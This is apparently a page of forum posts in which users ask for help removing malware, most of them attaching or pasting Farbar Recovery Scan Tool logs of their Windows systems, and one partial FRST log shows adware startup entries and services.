0x8007007f). Error: (03/12/2018 01:47:36 PM) (Source: Windows Search Service) (EventID: 3083) (User: ) Description: The protocol handler Mapi16 cannot be loaded. Error description: The specified procedure could not be found. (HRESULT : 0x8007007f). Error: (03/12/2018 01:40:43 PM) (Source: Windows Search Service) (EventID: 3083) (User: ) Description: The protocol handler Mapi16 cannot be loaded. Error description: The specified procedure could not be found. (HRESULT : 0x8007007f). Error: (03/12/2018 01:37:47 PM) (Source: Windows Search Service) (EventID: 3083) (User: ) Description: The protocol handler Mapi16 cannot be loaded. Error description: The specified procedure could not be found. (HRESULT : 0x8007007f). Error: (03/12/2018 01:33:12 PM) (Source: Brother BrLog) (EventID: 1001) (User: ) Description: TWN BrtTWN: [2018/03/12 13:33:12.509]: [00003460]: Initialize TwdsMain Class failed! Error: (03/12/2018 01:33:12 PM) (Source: Brother BrLog) (EventID: 1001) (User: ) Description: TWN BrtTWN: [2018/03/12 13:33:12.509]: [00003460]: ##### Fatal ERROR!! Create STI-device failed! ##### Error: (03/12/2018 01:33:10 PM) (Source: Brother BrLog) (EventID: 1001) (User: ) Description: TWN BrtTWN: [2018/03/12 13:33:10.824]: [00003460]: Initialize TwdsMain Class failed! System errors: ============= Error: (03/12/2018 01:46:49 PM) (Source: BROWSER) (EventID: 8032) (User: ) Description: The browser service has failed to retrieve the backup list too many times on transport \Device\NetBT_Tcpip_{C33AFBF4-9B97-4B88-9523-AF9EBA078846}. The backup browser is stopping. Error: (03/12/2018 01:44:58 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID {C97FCC79-E628-407D-AE68-A06AD6D8B4D1} and APPID {344ED43D-D086-4961-86A6-1106F4ACAD9B} to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC). This security permission can be modified using the Component Services administrative tool. Error: (03/12/2018 01:44:58 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID {C97FCC79-E628-407D-AE68-A06AD6D8B4D1} and APPID {344ED43D-D086-4961-86A6-1106F4ACAD9B} to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC). This security permission can be modified using the Component Services administrative tool. Error: (03/12/2018 09:06:36 AM) (Source: BROWSER) (EventID: 8032) (User: ) Description: The browser service has failed to retrieve the backup list too many times on transport \Device\NetBT_Tcpip_{C33AFBF4-9B97-4B88-9523-AF9EBA078846}. The backup browser is stopping. Error: (03/12/2018 09:03:51 AM) (Source: Service Control Manager) (EventID: 7022) (User: ) Description: The AMD FUEL Service service hung on starting. Error: (03/12/2018 09:03:20 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID {C97FCC79-E628-407D-AE68-A06AD6D8B4D1} and APPID {344ED43D-D086-4961-86A6-1106F4ACAD9B} to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC). This security permission can be modified using the Component Services administrative tool. Error: (03/12/2018 09:03:20 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID {C97FCC79-E628-407D-AE68-A06AD6D8B4D1} and APPID {344ED43D-D086-4961-86A6-1106F4ACAD9B} to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC). This security permission can be modified using the Component Services administrative tool. Error: (03/08/2018 12:59:23 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID {C97FCC79-E628-407D-AE68-A06AD6D8B4D1} and APPID {344ED43D-D086-4961-86A6-1106F4ACAD9B} to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC). This security permission can be modified using the Component Services administrative tool. ==================== Memory info =========================== Processor: AMD Athlon(tm) II X2 220 Processor Percentage of memory in use: 56% Total physical RAM: 8190.49 MB Available physical RAM: 3545.78 MB Total Virtual: 16379.16 MB Available Virtual: 11688.23 MB ==================== Drives ================================ Drive c: () (Fixed) (Total:931.41 GB) (Free:866.04 GB) NTFS \\?\Volume{98ef4543-8efb-11e3-874e-806e6f6e6963}\ (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: A03D0812) Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=931.4 GB) - (Type=07 NTFS) ==================== End of Addition.txt ============================
  9. Hi, I think I'm infected with a rootkit as I cannot back up my computer with blazeback, install bitdefender, or use any of the following programs: malwarebytes anti-rootkit, adwcleaner, hitmanpro, or zemana antimalware. I was able to successfully run MalwareBytes AntiMalware with the 'search for rootkits' (or something like that) checked, but it did not fix the problem. I always run Rkill successfully before attempting to execute these programs with administrative privileges and still get the 'The requested resource is in use.' error. I ran the Farbar Recovery Scan Tool (x64) for windows and attached the created FRST.txt and Addition.txt log files as I've seen in multiple threads. Thanks for any help! FRST.txt Addition.txt
  10. Hello, in response to Infected by CCleaner windows 64bit (Cupcake) I hope someone could please look at my scans, I ran Malwarebytes scan the day after finding out 5.33 download was hacked; it found the malware and I quarantined and deleted it. I then did my best to try and restore back to before the infection took hold. I don't know how good that worked, when I scan with MWB its clean. Attached are the Farbar and Addition files. Please advise when you can thank you very much - Do I need to do anything else at this point? Ps ( It was on my Windows 7 too, did the Malware scan, quar, delete and back up restore to earlier point) Mike- a humble appreciative customer. Addition.txt FRST.txt
  11. Hello and salutations! I am in a bit of a predicament where I cannot install malwarebytes nor any other antivirus programs. I have tried running mbar, mbam but got errors. Eset helped, somewhat, but not the underlining problem of installing an anti virus. My Google Kung Fu somehow got me to where the registry settings are for Windows Defender, and I got that back up and running, but it's not getting rid of the actual viruses/malware/trojans/etc. I did get somewhere with FRST64.exe, but I do not know how to interpret the FRST.txt nor the Addition.txt (attatched below). I'm running a Macbook Pro (early 2008) with a Windows 10 partition. I can boot the OS just fine and I have a recovery disk to get into the troubleshooting command prompt. I would greatly appreciate help with the fixlist.txt, and I know it can take about 24-48 hours to get a reply. I've had this problem for about a week now and only now do I swallow my pride and ask for help. Thank you for your time and hard work. FRST.txt Addition.txt P.S. If I have done something wrong (according to the forum code of conduct), I apologize in advance. I have literally never asked for help on a forum, ever.
  12. Over the weekend something happened to my Malwarebytes premium software. It now takes 10 to 12 hours to run a scan threat which I have set up to run daily. It used to take about an hour. Any suggestions? I did get a pop-up that said something was recently disabled on my malwarebyyes program. I also received a call on my phone from someone saying my computer was hacked my wife hung up on them maybe she shouldn't have...
  13. Hello, My computer is already infected. I am unable to run Malware bytes. It "cannot connect to the service". I ran the anti rootkit tool. I gave me the "DDA Driver was not installed error". I downloaded the FARBAR toolkit, executed it, and it has created the attached 'FRST.txt' and the 'addition.txt file'. Please note that FARBAR crashed , so the .TXT files may not be complete. Please help! Thanks, Mike FRST.txt Addition.txt
  14. Hi I have a virus and I decided to scan my computer deeper with farbar scan tool, this is what I had, Can you help me to read it and to make fix file? thank you very much Addition.txt FRST.txt
  15. We need some help removing a potential unwanted malware called $360Section. Malwarebytes or McAfee doesn't seem to detect it or remove it. I found another post on this forum from many months ago (17-July-2015) and the general help idea was to use Farbar. HOWEVER, someone named "TwinHeadedEagle" was helping and noted that, " This fix was created for this user for use on that particular machine. Running it on another one may cause damage and render the system unstable. So... now I'm trying to use Farbar and remove $360Section, and I don't want to assume the "fix" for the other person would be the same for me. This is where I need help. So far I've downloaded Farbar, saved it to the Desktop, run as administrator (with all options checked), and have the Addition.txt and Shortcut.txt and FRST.txt files saved. I will attach them for your viewing pleasure. I'm not sure what to do now. I'm using a ASUS laptop, 1.33GHz, 30GB HD, 2GB RAM, 32-bit, Windows 10. Addition.txt FRST.txt Shortcut.txt
  16. Hey if someone could take a peak at this and help me out I would appreciate it. I've run ESET Powelinks, Rogue Killer, MBAR, ComboFix, ADWCleaner, JRT FRST64. I can post all the logs if needed but if we can just use these for now that would save me time. Thank you ahead of time and like I said I can post others if need be or even start fresh. Addition.txt FRST.txt
  17. Greetings everyone, it seems I'm not lucky even on my birthday. Last night I saw the notorious "Wawtrak" trojan in system32/usp10.dll pop up warning from MalwareBytes, but unfortunately I did not ignore it. Usually I'm very careful when it comes to system files so I don't know what I was thinking. Anyway, I ran a scan, it found two instances of it, the software "fixed" it and asked me to restart. Needles to say... immediate blue screen flash on Windows startup, and Windows start up repair which, as usual, does nothing. Of course, I can't boot Windows now. Windows Recovery disc can't actually do anything but run the startup repair, run system restore (doesn't work) and open CMD which is probably my only solution. I tried running a scan with "Farbar Recovery Scan Tool", and attached the log here. I have yet to ask on other boards about the rules of practice of that tool so I can use it myself, but my question is this: Is there a way I can "unquarantine" the .dlls, return them to their normal state and location, and thus hopefully fix my PC, using Command Prompt? If not, can you help me with the FRST log? The mentioned usp10.dll was specified as "Known DLLs whitelist" I am sorry, but I had utorrent installed already and now that I have registered here, I am aware you don't like seeing P2P software on logs or anywhere. However my computer is unbootable and unfortunately I can't change that. Sincerely, tetrarch FRST.txt
  18. Hello my name is Ed, I could not find help for this problem in Brazil Hello friends I ask your help, my computer is very strange and when I try to run the Farbar Recovery Scan or FSS he quickly opens and closes. Could you help me? I tried to overtake Malware Bytes but nothing was found. I need your help
  19. Hello, I am in great need of somebody to help me with my maleware removal process. I have followed instruction from other threads but need somebody experienced to write me a fixlist.txt from my logs. I have dl'ed adwcleaner and frst.exe. I have the scan logs, which I will post subsequent to this, but I do not know if the information will change by the time I receive feedback because several people may use this computer by the time I get a reply. Thanks for any help provided!
  20. I have just run the Farbar Report and here are my results in the FRST.txt. Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 23-04-2015 Ran by tboe (administrator) on CLAY-PC on 23-04-2015 15:32:21 Running from C:\Users\tboe\DOWNLOADS Loaded Profiles: tboe & (Available profiles: tboe) Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States) Internet Explorer Version 11 (Default browser: Chrome) Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe () C:\Windows\System32\nvwmi64.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Microsoft Corporation) C:\Windows\System32\wlanext.exe (Broadcom Corporation) C:\Program Files\Broadcom Corporation\Broadcom USH Host Components\CV\bin\HostControlService.exe (Broadcom Corporation) C:\Program Files\Broadcom Corporation\Broadcom USH Host Components\CV\bin\HostStorageService.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe () C:\Windows\System32\nvwmi64.exe (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\HidMonitorSvc.exe (Microsoft Corporation) C:\Windows\System32\rundll32.exe (Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe (Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe (Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe (Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\ibtsiva.exe (Intel Corporation) C:\Windows\System32\IPROSetMonitor.exe (MKS Software Inc.) C:\Windows\System32\nutsrv4.exe (Dell Inc.) C:\Program Files\Dell\PPO\poaService.exe (Dell Inc.) C:\Program Files\Dell\PPO\poaSmSrv.exe (Dell Inc.) C:\Program Files\Dell\PPO\poaTaServ.exe (PTC Inc.) C:\PTC\Creo2_M130\PTC Portmapper\i486_nt\obj\portmap.exe (Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe (Crawler Group) C:\Program Files (x86)\Spyware Clear\SC_Svc64.exe (Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\Apoint.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApMsgFwd.exe (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\hidfind.exe (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApntEx.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Intel Corporation) C:\Windows\System32\igfxtray.exe (Intel Corporation) C:\Windows\System32\hkcmd.exe (Intel Corporation) C:\Windows\System32\igfxpers.exe (Intel Corporation) C:\Windows\System32\igfxsrvc.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe (Dell Inc.) C:\Program Files\Dell\PPO\DellPoaEvents.exe (Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe (Microsoft Corporation) C:\Windows\System32\rundll32.exe (Crawler Group) C:\Program Files (x86)\Spyware Clear\SpywareClearShield.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe (Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe (Crawler Group) C:\Program Files (x86)\Spyware Clear\SpywareClearUpdate.exe (Crawler Group) C:\Program Files (x86)\PCTechHotline\PCTechHotline.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe (Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe (Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe (Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\mediasrv.exe (Crawler Group) C:\Program Files (x86)\PCTechHotline\PCTHHook.exe (Crawler Group) C:\Program Files (x86)\PCTechHotline\PCTHHook64.exe (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe (Dell) C:\Program Files\Dell\Dell Foundation Services\DFSSvc.exe (Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe (BayHubTech/O2Micro International) C:\Windows\System32\drivers\o2flash.exe (SoftThinks SAS) C:\Program Files (x86)\Dell Backup and Recovery\SftService.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS\PrivacyIconClient.exe (SoftThinks - Dell) C:\Program Files (x86)\Dell Backup and Recovery\Components\DBRUpdate\DBRUpd.exe (SoftThinks - Dell) C:\Program Files (x86)\Dell Backup and Recovery\Toaster.exe (Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe () C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBRCrawler.exe (SoftThinks) C:\Program Files (x86)\Dell Backup and Recovery\SetMUILanguage.exe (Microsoft Corporation) C:\Windows\System32\bcdedit.exe (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe ==================== Registry (Whitelisted) ================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7637720 2014-09-23] (Realtek Semiconductor) HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1396592 2014-09-01] (Realtek Semiconductor) HKLM\...\Run: [nwiz] => C:\Program Files\NVIDIA Corporation\nview\nwiz.exe [2728736 2014-08-26] () HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [1795808 2014-08-26] (NVIDIA Corporation) HKLM\...\Run: [DellPoaEvents] => C:\Program Files\Dell\PPO\DellPoaEvents.exe [396496 2014-08-15] (Dell Inc.) HKLM\...\Run: [iAStorIcon] => C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [287592 2014-05-28] (Intel Corporation) HKLM\...\Run: [intelPROSet] => C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe [4876528 2014-05-29] (Intel® Corporation) HKLM\...\Run: [bTMTrayAgent] => rundll32.exe "C:\Program Files (x86)\Intel\Bluetooth\btmshellex.dll",TrayApp HKLM\...\Run: [Apoint] => C:\Program Files\DellTPad\Apoint.exe [727896 2014-03-13] (Alps Electric Co., Ltd.) HKLM\...\Run: [spywareClearShield] => C:\Program Files (x86)\Spyware Clear\SpywareClearShield.exe [3742528 2015-01-27] (Crawler Group) HKLM\...\Run: [spywareClearUpdater] => C:\Program Files (x86)\Spyware Clear\SpywareClearUpdate.exe [5412672 2015-01-27] (Crawler Group) HKLM-x32\...\Run: [iMSS] => C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS\PrivacyIconClient.exe [1087960 2014-04-29] (Intel Corporation) HKLM-x32\...\Run: [uSB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2014-04-10] (Intel Corporation) HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [926896 2012-09-23] (Adobe Systems Incorporated) HKLM-x32\...\Run: [PCTechHotline] => C:\Program Files (x86)\PCTechHotline\PCTechHotline.exe [1907528 2014-12-01] (Crawler Group) HKLM-x32\...\Run: [NuTCSetupEnviron] => C:\PTC\Creo2_M130\MKS Toolkit\bin\ncoeenv.exe [37248 2012-10-12] (MKS Software Inc.) Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation) HKU\S-1-5-21-2065806275-2866486248-1451515818-1002\...\RunOnce: [PriceFountain] => C:\Windows\SysWOW64\wscript.exe /E:vbscript /B "C:\Users\tboe\AppData\Roaming\PriceFountain\UpdateProc\bkup.dat" HKU\S-1-5-21-2065806275-2866486248-1451515818-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\RunOnce: [PriceFountain] => C:\Windows\SysWOW64\wscript.exe /E:vbscript /B "C:\Users\tboe\AppData\Roaming\PriceFountain\UpdateProc\bkup.dat" AppInit_DLLs: ,C:\Windows\system32\nvinitx.dll => C:\Windows\system32\nvinitx.dll [166616 2014-08-26] (NVIDIA Corporation) AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [146528 2014-08-26] (NVIDIA Corporation) ShellIconOverlayIdentifiers: [DBARFileBackuped] -> {831cebdd-6baf-4432-be76-9e0989c14aef} => C:\Windows\system32\mscoree.dll [2010-11-20] (Microsoft Corporation) ShellIconOverlayIdentifiers: [DBARFileNotBackuped] -> {275e4fd7-21ef-45cf-a836-832e5d2cc1b3} => C:\Windows\system32\mscoree.dll [2010-11-20] (Microsoft Corporation) CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) HKU\S-1-5-21-2065806275-2866486248-1451515818-1002\Software\Microsoft\Internet Explorer\Main,Start Page = http://dell13.msn.com/?pc=DCJB HKU\S-1-5-21-2065806275-2866486248-1451515818-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://dell13.msn.com/?pc=DCJB HKU\S-1-5-21-2065806275-2866486248-1451515818-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Start Page = http://dell13.msn.com/?pc=DCJB HKU\S-1-5-21-2065806275-2866486248-1451515818-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://dell13.msn.com/?pc=DCJB SearchScopes: HKLM -> DefaultScope {E89FDC37-9125-4F34-A560-ED1E72159487} URL = http://us.yhs4.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wny_dnldstr_15_14&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWinYahoo%26cd%3D2XzuyEtN2Y1L1Qzu0D0A0F0CzytAyCyByDtDyCtBtCtDtDtDtN0D0Tzu0StCtCzzyBtN1L2XzutAtFzytFyEtFtCtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StCzyzz0FzyyEyE0CtGtByDyD0BtGyBtCtB0DtGzz0AtCyBtGtBzzyEtB0C0CyE0A0Ezy0Fzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEtAzytCyC0D0BtCtGtAyBtDyDtGyEyBzzyEtG0B0FyB0DtGyDyC0EtByEzytAyCyCtAtBzy2QtN0A0LzuyEtN1B2Z1V1T1S1NzuyCyDyD%26cr%3D1132337041%26a%3Dwny_dnldstr_15_14%26os%3DWindows7 Professional&p={searchTerms} SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM -> {E89FDC37-9125-4F34-A560-ED1E72159487} URL = http://us.yhs4.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wny_dnldstr_15_14&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWinYahoo%26cd%3D2XzuyEtN2Y1L1Qzu0D0A0F0CzytAyCyByDtDyCtBtCtDtDtDtN0D0Tzu0StCtCzzyBtN1L2XzutAtFzytFyEtFtCtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StCzyzz0FzyyEyE0CtGtByDyD0BtGyBtCtB0DtGzz0AtCyBtGtBzzyEtB0C0CyE0A0Ezy0Fzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEtAzytCyC0D0BtCtGtAyBtDyDtGyEyBzzyEtG0B0FyB0DtGyDyC0EtByEzytAyCyCtAtBzy2QtN0A0LzuyEtN1B2Z1V1T1S1NzuyCyDyD%26cr%3D1132337041%26a%3Dwny_dnldstr_15_14%26os%3DWindows7 Professional&p={searchTerms} SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-2065806275-2866486248-1451515818-1002 -> DefaultScope {E89FDC37-9125-4F34-A560-ED1E72159487} URL = SearchScopes: HKU\S-1-5-21-2065806275-2866486248-1451515818-1002 -> {8CDE19E6-71C2-4B46-89B7-35F6A18C571A} URL = SearchScopes: HKU\S-1-5-21-2065806275-2866486248-1451515818-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> DefaultScope {E89FDC37-9125-4F34-A560-ED1E72159487} URL = SearchScopes: HKU\S-1-5-21-2065806275-2866486248-1451515818-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> {8CDE19E6-71C2-4B46-89B7-35F6A18C571A} URL = BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-09-23] (Adobe Systems Incorporated) BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\Office15\URLREDIR.DLL [2015-04-23] (Microsoft Corporation) Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL [2015-04-23] (Microsoft Corporation) Winsock: Catalog9 12 C:\Windows\SysWOW64\nutafun4.dll [164232 2012-10-12] (MKS Software Inc.) Winsock: Catalog9 13 C:\Windows\SysWOW64\nutafun4.dll [164232 2012-10-12] (MKS Software Inc.) Winsock: Catalog9-x64 12 C:\Windows\system32\nutafun4.dll [205624 2012-10-12] (MKS Software Inc.) Winsock: Catalog9-x64 13 C:\Windows\system32\nutafun4.dll [205624 2012-10-12] (MKS Software Inc.) Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 StartMenuInternet: IEXPLORE.EXE - iexplore.exe FireFox: ======== FF Plugin: @microsoft.com/GENUINE -> disabled No File FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2014-04-29] (Intel Corporation) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2014-04-29] (Intel Corporation) FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL [2015-04-23] (Microsoft Corporation) FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2014-08-24] (NVIDIA Corporation) FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2014-08-24] (NVIDIA Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-04-19] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-04-19] (Google Inc.) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2012-09-23] (Adobe Systems Inc.) FF Plugin HKU\S-1-5-21-2065806275-2866486248-1451515818-1002: @citrixonline.com/appdetectorplugin -> C:\Users\tboe\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2015-04-23] (Citrix Online) FF Plugin HKU\S-1-5-21-2065806275-2866486248-1451515818-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0: @citrixonline.com/appdetectorplugin -> C:\Users\tboe\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2015-04-23] (Citrix Online) Chrome: ======= CHR Profile: C:\Users\tboe\AppData\Local\Google\Chrome\User Data\Default CHR Extension: (Google Slides) - C:\Users\tboe\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-04-19] CHR Extension: (Google Docs) - C:\Users\tboe\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-04-19] CHR Extension: (Google Drive) - C:\Users\tboe\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-04-19] CHR Extension: (YouTube) - C:\Users\tboe\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-04-19] CHR Extension: (Google Search) - C:\Users\tboe\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-04-19] CHR Extension: (Google Sheets) - C:\Users\tboe\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-04-19] CHR Extension: (Bookmark Manager) - C:\Users\tboe\AppData\Local\Google\Chrome\User Data\Default\Extensions\gmlllbghnfkpflemihljekbapjopfjik [2015-04-21] CHR Extension: (Chrome Hotword Shared Module) - C:\Users\tboe\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-04-19] CHR Extension: (Google Wallet) - C:\Users\tboe\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-04-19] CHR Extension: (Gmail) - C:\Users\tboe\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-04-19] ==================== Services (Whitelisted) ================= (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R2 ApHidMonitorService; C:\Program Files\DellTPad\HidMonitorSvc.exe [87384 2014-03-27] (Alps Electric Co., Ltd.) R2 cae99edb; c:\Program Files (x86)\Super Optimizer\SupOptStats.dll [2320432 2015-04-02] () R2 ClickToRunSvc; C:\PROGRAM FILES\MICROSOFT OFFICE 15\CLIENTX64\OFFICECLICKTORUN.EXE [2169016 2014-01-02] (Microsoft Corporation) R2 Dell Foundation Services; 